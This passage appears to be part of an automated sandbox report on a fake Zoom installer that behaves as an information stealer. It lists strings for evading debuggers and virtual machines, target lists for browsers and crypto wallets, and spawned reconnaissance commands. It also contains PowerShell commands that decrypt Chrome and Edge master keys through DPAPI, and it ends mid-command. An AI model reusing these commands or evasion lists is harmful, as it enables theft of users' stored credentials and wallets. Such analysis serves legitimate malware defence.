ERRORLOOKUPACCOUNTSIDWDNSRECORDLISTFREEGETCURRENTPROCESSGETSHORTPATHNAMEWWSAENUMPROTOCOLSWGTB STANDARD TIMEFLE STANDARD TIMEGMT STANDARD TIMECORRUPT ZIP FILE FRACTIONAL SECONDINDEX > WINDOWEND1192092895507812559604644775390625INVALID BIT SIZE UNKNOWN TYPE KIND HAS INVALID NAMEREFLECT: CALL OF REFLECT.VALUE.LENREFLECT: NEW(NIL)IMAGELIST_DESTROYCHOOSEPIXELFORMATDELETEENHMETAFILEINTERSECTCLIPR
    Source: ZoomInstaller.exeBinary or memory string: RUNQUEUE= STOPWAIT= RUNQSIZE= GFREECNT= THROWING= SPINNING=ATOMICAND8FLOAT64NANFLOAT32NANEXCEPTION PTRSIZE= TARGETPC= UNTIL PC=UNKNOWN PCRUNTIME: GGOROUTINE TERMINATEDOWNER DIEDDNSQUERY_WGETIFENTRYCANCELIOEXCREATEPIPEGETVERSIONWSACLEANUPWSASTARTUPGETSOCKOPTDNSAPI.DLLWS2_32.DLL%!WEEKDAY(SHORT READ12207031256103515625PARSEFLOATLOCKFILEEXWSASOCKETWCOMPLEX128T.KIND == COMBINERGNGETBKCOLORGETOBJECTWSETBKCOLORSTRETCHBLTALPHABLENDGLOBALFREEGLOBALLOCKDRAGFINISHBEGINPAINTCREATEMENUDELETEMENUDRAWICONEXGETDLGITEMGETSUBMENULOADIMAGEWMOVEWINDOWREMOVEMENUSETCAPTURESHOWWINDOWCONTENT-IDMESSAGE-IDPARSEADDR(INVALID IPCLASSCSNETCLASSCHAOSADDITIONALSKIPPING: RES BINDERRES MASTERRESUMPTIONEXP MASTERHTTP_PROXYHTTP_PROXYHTTP2DEBUGCRYPTO/TLSRIPEMD-160DWMAPI.DLLISVALIDSIDLOCALALLOCOPENEVENTWOPENMUTEXWOPENTHREADPULSEEVENTRESETEVENTSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1BASE_NONCEPOSTALCODEAVX512IFMAAVX512VBMIAVX512VNNIAVX512GFNIAVX512VAESAVX512BF1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27FV-AZ269-80ARCHIBALDPCRUNNERADMINAAYRAP7XFUOWATCHER.EXEMITMWEB.EXECHARLES.EXEPOSTMAN.EXEFIDDLER.EXEOLLYDBG.EXEFIDDLER.EXEREGEDIT.EXETASKMGR.EXEVMUSRVC.EXEDF5SERV.EXEQEMU-GA.EXEOLLYDBG.EXEDISCORD.EXEUSER_DATA#2USER_DATA#3USER_DATA#4USER_DATA#5IDENTIFIANTYOROIWALLETKARDIACHAINNIFTYWALLETBRAVEWALLETEQUALWALLETGUILDWALLETMARSHALJSONMARSHALTEXTUNREACHABLE_AUTH_CRYPT_QUERY_ONLY_CACHE_SIZESHORT WRITESUBMISSIONSNIL CONTEXTI/O TIMEOUTHTTP2SERVERHTTP2CLIENTENABLE_PUSHEND_HEADERS/INDEX.HTML ERRCODE=%V, SETTINGS:RETRY-AFTERTTL EXPIREDEARLY HINTSBAD REQUESTBAD GATEWAY/DEV/STDOUT/DEV/STDERROPENPROCESSGETFILETYPE BYTES ...
    Source: ZoomInstaller.exeBinary or memory string: RUNTIME: SP=ABI MISMATCHWRONG TIMERSINVALID SLOTHOST IS DOWNILLEGAL SEEKGETLENGTHSIDGETLASTERRORGETSTDHANDLEGETTEMPPATHWLOADLIBRARYWREADCONSOLEWSETENDOFFILETRANSMITFILEGETADDRINFOWADVAPI32.DLLIPHLPAPI.DLLKERNEL32.DLLNETAPI32.DLL152587890625762939453125OPENSERVICEWREVERTTOSELFCREATEEVENTWGETCONSOLECPUNLOCKFILEEXVIRTUALQUERY HAS NO NAME HAS NO TYPEREFLECT.COPYCOMCTL32.DLLCOMDLG32.DLLCHOOSECOLORWCREATEBITMAPDELETEOBJECTEXTCREATEPENGETTEXTCOLORSELECTOBJECTSETTEXTCOLORGRADIENTFILLGLOBALUNLOCKLOADRESOURCELOCKRESOURCESETLASTERROROLEAUT32.DLLSYSSTRINGLENOPENGL32.DLLPDHOPENQUERYEXTRACTICONWENABLEWINDOWGETCURSORPOSPEEKMESSAGEWPOSTMESSAGEWREDRAWWINDOWSENDMESSAGEWSETCURSORPOSSETWINDOWPOSUPDATEWINDOWWINDOWFROMDCWINSPOOL.DRVRANDAUTOSEEDMIME-VERSIONX-IMFORWARDSX-POWERED-BYCONTENT TYPERCODESUCCESSRCODEREFUSEDNOT POLLABLETLSUNSAFEEKMCLOSE NOTIFYREMOTE ERRORC HS TRAFFICS HS TRAFFICC AP TRAFFICS AP TRAFFIC (SENSITIVE)GOTYPESALIASCFGMGR32.DLLSETUPAPI.DLLWINTRUST.DLLWTSAPI32.DLLREPORTEVENTWCREATEMUTEXWGETCOMMSTATEGETPROCESSIDRELEASEMUTEXRESUMETHREADSETCOMMBREAKSETCOMMSTATESETERRORMODESETSTDHANDLETHREAD32NEXTVIRTUALALLOCNTCREATEFILECOCREATEGUIDECDSA-SHA256ECDSA-SHA384ECDSA-SHA512CALLER ERRORSERIALNUMBERAVX5124FMAPSAVX512BITALG88.132.231.7152.251.116.35194.154.78.6920.99.160.173195.74.76.22234.105.183.6892.211.55.19979.104.209.3334.145.89.174109.74.154.90195.239.51.59192.40.57.23464.124.12.16234.142.74.220109.74.154.9134.105.72.241109.74.154.92213.33.142.5093.216.75.209192.87.28.10334.85.253.17023.128.248.4635.229.69.22734.141.245.2534.85.243.24187.166.50.21334.145.195.5835.192.93.10784.147.54.113W0FJUOVMCCP5AMITMPROXY.EXEWIRESHARK.EXEWIRESHARK.EXEPRL_TOOLS.EXEFILEZILLA.EXEENCRYPTED_KEYGUEST PROFILEBRAVE DEFAULTOPERA DEFAULTBLISK DEFAULTAUTHENTICATORHARMONYWALLET_BUSY_TIMEOUT_FOREIGN_KEYS_JOURNAL_MODE_LOCKING_MODEAUTH_USER_ADDLAME REFERRALSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAUTHORIZATIONCACHE-CONTROLLAST-MODIFIEDACCEPT-RANGESIF-NONE-MATCH[FRAMEHEADER INVALID BASE ACCEPT-RANGESAUTHORIZATIONCACHE-CONTROLCONTENT-RANGEIF-NONE-MATCHLAST-MODIFIEDFQDN TOO LONGSOCKS CONNECTRESET CONTENTLOOP DETECTEDFIELD NAME %Q IN HOST NAMEFINDFIRSTFILEWAKEABLESLEEPPROFMEMACTIVEPROFMEMFUTURETRACESTACKTABEXECRINTERNALTESTRINTERNALGC SWEEP WAITOUT OF MEMORY IS NIL, NOT VALUE METHOD BAD MAP STATE SPAN.BASE()=BAD FLUSHGEN , NOT POINTER != SWEEPGEN MB GLOBALS, WORK.NPROC= WORK.NWAIT= NSTACKROOTS= FLUSHEDWORK DOUBLE UNLOCK S.SPANCLASS= MB) WORKERS=MIN TOO LARGE-BYTE BLOCK (RUNTIME: VAL=RUNTIME: SEQ=FATAL ERROR: IDLETHREADS= SYSCALLTICK=LOAD64 FAILEDXADD64 FAILEDXCHG64 FAILEDNIL STACKBASE}
    Source: ZoomInstaller.exeBinary or memory string: INVALID EXCHANGENO ROUTE TO HOSTINVALID ARGUMENTMESSAGE TOO LONGOBJECT IS REMOTEREMOTE I/O ERRORSETFILEPOINTEREXOPENPROCESSTOKENREGQUERYINFOKEYWREGQUERYVALUEEXWDNSNAMECOMPARE_WCREATEDIRECTORYWFLUSHFILEBUFFERSGETCOMPUTERNAMEWGETFULLPATHNAMEWGETLONGPATHNAMEWREMOVEDIRECTORYWNETAPIBUFFERFREETIME: BAD [0-9]*2384185791015625GODEBUG: VALUE "DUPLICATETOKENEXGETCURRENTTHREADRTLVIRTUALUNWIND: VALUE OF TYPE CONTEXT CANCELEDIMAGELIST_CREATEIMAGELIST_DRAWEXGETOPENFILENAMEWGETSAVEFILENAMEWCLOSEENHMETAFILECOPYENHMETAFILEWCREATEDIBSECTIONGETVIEWPORTORGEXSETVIEWPORTORGEXGDIPDISPOSEIMAGEGETCONSOLETITLEWGETCONSOLEWINDOWGETMODULEHANDLEWGETNUMBERFORMATWCOCREATEINSTANCECOGETCLASSOBJECTWGLCREATECONTEXTWGLDELETECONTEXTPDHVALIDATEPATHWADJUSTWINDOWRECTBRINGWINDOWTOTOPDISPATCHMESSAGEWENUMCHILDWINDOWSGETCLIPBOARDDATAGETMENUITEMCOUNTGETMENUITEMINFOWGETSYSCOLORBRUSHGETSYSTEMMETRICSISDIALOGMESSAGEWUNREGISTERCLASSWREGISTERCLASSEXWSETCLIPBOARDDATASETMENUITEMINFOWTRACKPOPUPMENUEXTRANSLATEMESSAGEGETTHEMEPARTSIZECONTENT-LANGUAGEINVALID DNS NAMERCODEFORMATERRORUNPACKING HEADERNO RENEGOTIATIONSIGNATURESCHEME(INVALID ENCODINGSETENTRIESINACLWSETSERVICESTATUSCRYPTPROTECTDATACRYPTQUERYOBJECTCONNECTNAMEDPIPECREATEJOBOBJECTWCREATENAMEDPIPEWDEFINEDOSDEVICEWFINDFIRSTVOLUMEWGETLOGICALDRIVESGETNAMEDPIPEINFOGETPRIORITYCLASSSETDLLDIRECTORYWSETFILEVALIDDATASETPRIORITYCLASSVIRTUALPROTECTEXRTLGETCURRENTPEBGETGUITHREADINFOWINVERIFYTRUSTEXLENGTH TOO LARGEAVX512VPCLMULQDQFIDDLER.WEBUI.EXEVGAUTHSERVICE.EXEPROCESSHACKER.EXEJOEBOXCONTROL.EXEWRITE AFTER CLOSEREFLECT.VALUE.INTIN STRING LITERAL0123456789ABCDEFX0123456789ABCDEFX%%!%C(BIG.INT=%S)MULTIPARTMAXPARTSMESSAGE TOO LARGEINVALID STREAM IDTRANSFER-ENCODINGHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIF-MODIFIED-SINCEFRAME_PING_LENGTHTRUNCATED HEADERSIF-MODIFIED-SINCETRANSFER-ENCODINGX-FORWARDED-PROTOX-IDEMPOTENCY-KEYMOVED PERMANENTLYFAILED DEPENDENCYTOO MANY REQUESTSWINREADLINKVOLUMEEXEC: KILLING CMDEXEC: NOT STARTEDGOROUTINE PROFILEALLTHREADSSYSCALLGC ASSIST MARKINGSELECT (NO CASES)SYNC.RWMUTEX.LOCKWAIT FOR GC CYCLETRACE PROC STATUSSYNC.(*COND).WAIT: MISSING METHOD NOTETSLEEPG ON G0BAD TINYSIZECLASSKEY ALIGN TOO BIGRUNTIME: POINTER G ALREADY SCANNEDMARK - BAD STATUSSCANOBJECT N == 0SWEPT CACHED SPANMARKBITS OVERFLOWRUNTIME: SUMMARY[RUNTIME: LEVEL = , P.SEARCHADDR = RTLGETCURRENTPEB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3528Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1768Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3611Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 940Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3534Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1336Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3030Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1415Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 3611 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 940 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6016Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: ZoomInstaller.exeBinary or memory string: sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=level 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameparsing time out of range is too largenot availabledalTLDpSugct?3814697265625GetTempPath2WModule32NextWRtlGetVersionRegEnumValueWImageList_AddCreateRectRgnGetDeviceCapsSetBrushOrgExCreateActCtxWFindResourceWRtlMoveMemoryCoTaskMemFreeOleInitializeSysFreeStringwglShareListsPdhCloseQueryShellExecuteWAnimateWindowDestroyWindowDrawFocusRectGetClassNameWGetClientRectGetMenuItemIDGetScrollInfoGetSystemMenuGetWindowRectOpenClipboardSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWname too longtlsmaxrsasizeaccess denieduser canceledPKCS1WithSHA1ECDSAWithSHA1CLIENT_RANDOMgzip, deflategocacheverifyinstallgoroothtml/templateRegDeleteKeyWDeleteServiceStartServiceWGetDriveTypeWThread32FirstWaitCommEventRtlInitStringEnumProcessesExitWindowsExtimeEndPeriodWTSFreeMemoryinvalid ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSemail addressshared_secretempty integerunsupported: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228tVaUeNrRraoKwaVMware SVGA 3Dvmwareuser.exexenservice.exevmwaretray.exeChrome DefaultYandex DefaultCocCoc Defaultis a directory_secure_deleteunexpected EOFinternal errorgetprotobynameunknown mode: Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofunknown error unknown code: Not AcceptableComputerNameEx
    Source: ZoomInstaller.exeBinary or memory string: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptdnsapi.dllws2_32.dll%!Weekday(short read12207031256103515625ParseFloatLockFileExWSASocketWcomplex128t.Kind == CombineRgnGetBkColorGetObjectWSetBkColorStretchBltAlphaBlendGlobalFreeGlobalLockDragFinishBeginPaintCreateMenuDeleteMenuDrawIconExGetDlgItemGetSubMenuLoadImageWMoveWindowRemoveMenuSetCaptureShowWindowContent-IdMessage-IdParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: res binderres masterresumptionexp masterHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsRIPEMD-160dwmapi.dllIsValidSidLocalAllocOpenEventWOpenMutexWOpenThreadPulseEventResetEventSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27fv-az269-80ARCHIBALDPCrunneradminaAYRAp7xfuowatcher.exemitmweb.exeCharles.exePostman.exeFiddler.exeOllyDbg.exefiddler.exeregedit.exetaskmgr.exevmusrvc.exedf5serv.exeqemu-ga.exeollydbg.exediscord.exeuser_data#2user_data#3user_data#4user_data#5identifiantYoroiWalletKardiaChainNiftyWalletBraveWalletEqualWalletGuildWalletMarshalJSONMarshalTextunreachable_auth_crypt_query_only_cache_sizeshort writesubmissionsnil contexti/o timeouthttp2serverhttp2clientENABLE_PUSHEND_HEADERS/index.html ErrCode=%v, settings:retry-afterTTL expiredEarly HintsBad RequestBad Gateway/dev/stdout/dev/stderrOpenProcessGetFileType bytes ...
    Source: ZoomInstaller.exeBinary or memory string: SYSTEMROOT=assistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailunspecifiedcgocall nil s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad messagefile existsbad addressRegCloseKeyCloseHandleCreateFileWDeleteFileWExitProcessFreeLibrarySetFileTimeVirtualLockWSARecvFromclosesocketgetpeernamegetsocknamecrypt32.dllmswsock.dllsecur32.dllshell32.dlluserenv.dlltime: file 30517578125ProcessPrngMoveFileExWNetShareAddNetShareDelbad argSizemethodargs(reflect.Set.WithCancel.WithValue(PrintDlgExWmsimg32.dllSwapBuffersgdiplus.dllGlobalAllocDestroyIconDestroyMenuDrawMenuBarDrawTextExWFindWindowWGetAncestorGetCaretPosGetIconInfoGetKeyStateGetMenuInfoGetMessageWGetSysColorLoadCursorWLoadStringWMessageBeepMessageBoxWSetMenuInfouxtheme.dllIsAppThemedIn-Reply-ToReturn-PathClassHESIODauthoritiesadditionalstls10servertls: alert(local errorc e traffictraffic updApplicationHTTPS_PROXYhttps_proxygocachehashgocachetestarchive/tarcrypto/x509archive/zipSHA-512/224SHA-512/256BLAKE2s-256BLAKE2b-256BLAKE2b-384BLAKE2b-512sechost.dllversion.dllGetFileTimeSetCommMaskVirtualFreeNetUserEnumCoGetObjectEnumWindowsToUnicodeExinvalid oidpsk_id_hashavx512vnniwavx512vbmi284.147.62.1295.25.204.9092.211.52.6234.138.96.2334.83.46.13035.237.47.12195.239.51.3AppOnFly-VPSPeter WilsonFX7767MOR6Q6RDhJ0CNFevzX8Nl0ColNQ5bqPqONjHVwexsSmitmdump.exeInsomnia.exeKsDumper.exevmacthlp.exevboxtray.exevmtoolsd.exeksdumper.exepestudio.exeTelegram.exemot_de_passeidentifiantsEdge DefaultBinanceChainGuardaWalletJaxxxLibertyTerraStationMartianAptosBitAppWalletAtomicWalletSaturnWalletTempleWalletwith name %q_auto_vacuum_synchronoussqlite_cryptauthenticateauth_enabledshort bufferinvalid baseContent-Typemultipathtcp127.0.0.1:53no such hostunknown portCIDR addressinvalid portgetaddrinfowcan't happentransmitfilehttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2out of range100-continuerecv_goaway_Multi-StatusNot ModifiedUnauthorizedI'm a teapotNot Extendedproxyconnectexit status sweepWaiterstraceStringsspanSetSpinemspanSpecialtraceTypeTabgcBitsArenasmheapSpecialgcpacertraceharddecommitmadvdontneeddumping heapchan receivelfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (
    Source: ZoomInstaller.exeBinary or memory string: Handshakemath/randwinmm.dllPurgeCommSetupComminfo_hashQ9IATRKPRHQarZhrdBpjd1bnJkfVlHPxmdUOpVyxx64dbg.exex96dbg.exevmsrvc.exex32dbg.exeprl_cc.exechrome.exemsedge.exemotdepassepassphrasesauvegardeMathWalletEVERWalletPetraAptosFewchaMovePaliWalletMetamask_EMetaMask_O for type user32.dll2006-01-02_auth_user_auth_pass_auth_saltimpossible
    Source: ZoomInstaller.exeBinary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFilePointerNetUserGetInfoGetUserNameExWTranslateNameW procedure in winapi error #: extra text: invalid syntax1907348632812595367431640625OpenSCManagerWModule32FirstWunsafe.Pointer on zero Valueunknown method.WithoutCancel.WithDeadline(RegSetValueExWLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWSizeofResourceCoInitializeExCoUninitializeSysAllocStringwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeAccept-CharsetDkim-SignatureRCodeNameErrorResourceHeaderunreachable: bad record MACneed more dataREQUEST_METHODmime/multipartControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeVirtualProtectVirtualQueryExGetShellWindowVerQueryValueWdata truncated169.150.197.118212.119.227.165109.145.173.169212.119.227.151195.181.175.105193.225.193.201212.119.227.167BEE7370C-8C0C-4DESKTOP-Z7LUJHJDESKTOP-0HHYPKQDESKTOP-TUAHF5IDESKTOP-NAKFFMTWIN-5E07COS9ALRB30F0242-1C6A-4DESKTOP-VRSQLAGDESKTOP-D019GDMDESKTOP-WI8CLETDESKTOP-B0T93D6DESKTOP-1PYKP29DESKTOP-1Y2433R6C4E733F-C2D9-4DESKTOP-WG3MYJSDESKTOP-7XC6GEZDESKTOP-5OV9S0OBinaryNinja.exevboxservice.exeUnknown versionVivaldi DefaultLiqualityWalletMaiarDeFiWalletAuthenticator_EzipinsecurepathGetMonitorInfoWBEGIN IMMEDIATEBEGIN EXCLUSIVEmissing address/etc/mdns.allowunknown networknegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandleallocmRInternalGC (fractional)write heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockruntime.Goschedmalloc deadlockruntime error: elem size wrong with GC prog
    Source: ZoomInstaller.exe, 00000000.00000002.1983594822.00000297456FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get captionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get VersionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,